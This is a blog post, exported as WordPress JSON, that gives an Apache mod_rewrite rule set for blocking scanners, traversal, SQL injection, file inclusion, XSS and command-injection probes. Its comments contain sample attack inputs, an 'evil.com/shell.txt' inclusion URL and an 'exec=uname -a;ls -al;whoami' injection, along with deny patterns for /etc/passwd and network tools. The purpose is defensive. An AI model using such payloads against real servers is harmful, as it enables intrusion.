# Hardened Apache Mod_Rewrite Security Rule
\n# Ref: http:\/\/httpd.apache.org\/docs\/2.0\/mod\/mod_rewrite.html#rewritecond
\n# NC = ‘nocase|NC’ (no case-sensitive)
\n# OR = ‘ornext|OR’ (or next condition)
\n# L = last rule
\nRewriteEngine on<\/p>\n
# Allow only GET and POST verbs
\n# ‘Coz most vul scanners use HEAD for hunting buggy files existence
\nRewriteCond %{REQUEST_METHOD} !^(GET|POST)$ [NC,OR]
\n# Ban Non-GUI Browsers
\nRewriteCond %{HTTP_USER_AGENT} ^.*(lynx|wget).* [NC,OR]<\/p>\n
# Ban Typical Vulnerability Scanners and others<\/p>\n
RewriteCond %{HTTP_USER_AGENT} ^()$ [NC,OR] # void of UserAgent<\/p>\n
# Known Web vulnerabilty Scanners<\/p>\n
RewriteCond %{HTTP_USER_AGENT} ^.*(syhunt|sqlmap|WhatWeb|Netsparker|w3af|Nstalker|acunetix|qualys|nikto|wikto|pikto|pykto).* [NC,OR]<\/p>\n
# Random Underground Web Exploit Scanners<\/p>\n
RewriteCond %{HTTP_USER_AGENT} ^.*(javascript\\:alert|0d\\s0a|ZeW|SlimBrowser|drone|DataCha|SBIder|Shelob|MobileRunner|Microsoft\\sOffice|Plesk|Itah|Mosill|Internet\\sExplorer\\s4\\.01|al_viewer|NetSeer|MSFrontPage|Yandex|webcollage|lwp\\-trivial|Isidorus|core\\-project|\\<script\\>|Toata\\sdragostea\\smea\\spentru\\sdiavola|StackRambler|Firebat|Y\\!J\\-SRD|ZmEu|libwww|perl|java|curl|ruby|python|scan|fuck|kiss|ass|Morfeus|0wn|hack|h4x|h4x0r).* [NC,OR]
\n# Denial-of-Service Tool
\nRewriteCond %{HTTP_USER_AGENT} ^.*(ApacheBench).* [NC,OR]<\/p>\n
RewriteCond %{HTTP_USER_AGENT} ^.*(WWW\\-Mechanize|revolt|Crawl|Mail\\.Ru|Walker|sbide|findlinks|spide|Ace\\sExplorer|winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]<\/p>\n
# Disable access to cgi-bins if not used
\nRewriteCond %{REQUEST_URI} ^\/(cgi\\.cgi|webcgi|cgi\\-914|cgi\\-915|bin|cgi|mpcgi|cgi\\-bin|ows\\-bin|cgi\\-sys|cgi\\-local|htbin|cgibin|cgis|scripts|cgi\\-win|fcgi\\-bin|cgi\\-exe|cgi\\-home|cgi\\-perl|scgi\\-bin)\/ [NC,OR]
\n# Block out common attack strings
\n# Additional filtering can be put into
\n# HTTP_USER_AGENT, HTTP_REFERER, HTTP_COOKIE,HTTP_FORWARDED,HTTP_ACCEPT<\/p>\n
# Directory Traversal, Null Byte Injection, HTTP Response Splitting
\nRewriteCond %{QUERY_STRING} ^.*(\\.\\.\\\/|\\.\\.%2f|\\.\\.%5C|\\.\\.%252F|\\.\\.%255C|\\.\\.%u2215|%u002e%u002e%u2215|%252e%252e%252f|%00|\\\\x00|\\\\u00|%5C00|%09|%0D%0A) [NC,OR]<\/p>\n
# SQL Injection Probing
\nRewriteCond %{QUERY_STRING} ^.*(\\@\\@version|CHR\\(|CHAR\\(|UNION%20SELECT|\/select\/|\/union\/|\/insert\/|\/update\/|\/delete\/).* [NC,OR]
\nRewriteCond %{QUERY_STRING} ^.*(or|and)%20([0-9]=[0-9]).* [NC,OR]
\n# Remote\/Local File Inclusion
\n# RFI: yoursite.com\/?pg=http:\/\/evil.com\/shell.txt?
\n# LFI: yoursite.com\/?pg=\/logs\/access_log?
\nRewriteCond %{QUERY_STRING} .*(=https|=http|=ftp)(:\/\/|%3a%2f%2f).*\\?$ [NC,OR]
\nRewriteCond %{QUERY_STRING} (\\\/access_log|boot\\.ini|\\\/etc\\\/passwd|%2Fetc%2Fpasswd|c:\\\\boot\\.ini|c%3A\\\\boot\\.ini|c:\\\/boot\\.ini|c:%2Fboot\\.ini|c%3A%2Fboot\\.ini|c:boot\\.ini|c%3Aboot\\.ini).* [NC,OR]<\/p>\n
# PHP Version Probing
\nRewriteCond %{QUERY_STRING} ^(=PHP).* [NC,OR]<\/p>\n
# XSS Probing
\nRewriteCond %{QUERY_STRING} ^.*(\\<|%3C).*script.*(\\>|%3E) [NC,OR]
\nRewriteCond %{QUERY_STRING} ^.*(\/XSS\/).* [NC,OR]<\/p>\n
# PHP GLOBALS Overriding
\nRewriteCond %{QUERY_STRING} GLOBALS(=|\\[|\\%[0-9A-Z]{0,2}) [NC,OR]<\/p>\n
# PHP REQUEST variable Overriding
\nRewriteCond %{QUERY_STRING} _REQUEST(=|\\[|\\%[0-9A-Z]{0,2}) [NC,OR]<\/p>\n
# PHP Command Injection Probing
\n# vuln.php?exec=uname -a;ls -al;whoami
\nRewriteCond %{QUERY_STRING} ^.*(=|;)(uname%20-|ls%20-|whoami).* [NC,OR]<\/p>\n
# PHP CGI code execution<\/p>\n
RewriteCond %{QUERY_STRING} ^[^=]*$ [OR]<\/p>\n
RewriteCond %{QUERY_STRING} %2d|\\-<\/p>\n
# Deny access
\nRewriteRule ^(.*)$ \/path\/to\/friendly_errror.php [F,L]<\/p>\n
<\/p>\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
# Hardened Apache Mod_Rewrite Security Rule # Ref: http:\/\/httpd.apache.org\/docs\/2.0\/mod\/mod_rewrite.html#rewritecond # NC = ‘nocase|NC’ (no case-sensitive) # OR = ‘ornext|OR’ (or next condition) # L = last rule RewriteEngine on<\/p>\n
# Allow only GET and POST verbs # ‘Coz most vul scanners use HEAD for hunting buggy files existence RewriteCond %{REQUEST_METHOD} !^(GET|POST)$ [NC,OR] # Ban Non-GUI […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"_links":{"self":[{"href":"https:\/\/mohan.sg\/index.php?rest_route=\/wp\/v2\/posts\/2069"}],"collection":[{"href":"https:\/\/mohan.sg\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mohan.sg\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mohan.sg\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mohan.sg\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2069"}],"version-history":[{"count":4,"href":"https:\/\/mohan.sg\/index.php?rest_route=\/wp\/v2\/posts\/2069\/revisions"}],"predecessor-version":[{"id":2074,"href":"https:\/\/mohan.sg\/index.php?rest_route=\/wp\/v2\/posts\/2069\/revisions\/2074"}],"wp:attachment":[{"href":"https:\/\/mohan.sg\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2069"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mohan.sg\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2069"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mohan.sg\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2069"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}